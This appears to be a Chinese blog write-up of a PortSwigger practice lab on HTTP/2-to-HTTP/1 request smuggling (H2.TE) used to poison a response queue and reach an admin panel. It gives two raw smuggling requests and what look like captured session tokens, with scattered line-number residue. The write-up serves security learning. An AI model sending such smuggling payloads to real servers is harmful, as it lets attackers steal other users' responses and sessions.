从业者-响应队列投毒-H2.TE请求走私
# 实验室:通过H2.TE请求走私实现响应队列投毒
# 题目
此实验室容易受到请求走私的攻击,因为前端服务器会降级 HTTP/2 请求,即使这些请求的长度不一致。
若要解决实验室问题,请执行响应队列投毒并闯入位于/admin
的管理面板,然后删除carlos
用户。管理员用户大约每 15 秒登录一次。
与后端的连接每 10 个请求重置一次,当你让连接进入不理想状态时,请不要担心 - 只需发送一些正常请求即可获得新的连接。
- name: 实验室-从业者
desc: 通过H2.TE请求走私实现响应队列投毒 >>
avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
link: https://portswigger.net/web-security/request-smuggling/advanced/response-queue-poisoning/lab-request-smuggling-h2-response-queue-poisoning-via-te-request-smuggling
bgColor: '#001350'
textColor: '#4cc1ff'
1
2
3
4
5
6
2
3
4
5
6
# 实操
(目前只有图,文字后面有时间补)
点击 “ACCESS THE LAB” 进入实验室。
POST / HTTP/2
Host: ...
Content-Length: 30
Transfer-Encoding: chunked
0
GET /404 HTTP/1.1
Foo: x
1
2
3
4
5
6
7
8
9
2
3
4
5
6
7
8
9
POST / HTTP/2
Host: ...
Content-Length: 91
Transfer-Encoding: chunked
0
GET /404 HTTP/1.1
Host: ...
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
Iy7Jck5jDc0f0l7gA3JXIuICl3GJY5eQ
1
CnFkGZiAUFT0oxRdgYhrNrJ5qHVeTkwa
1
编辑 (opens new window)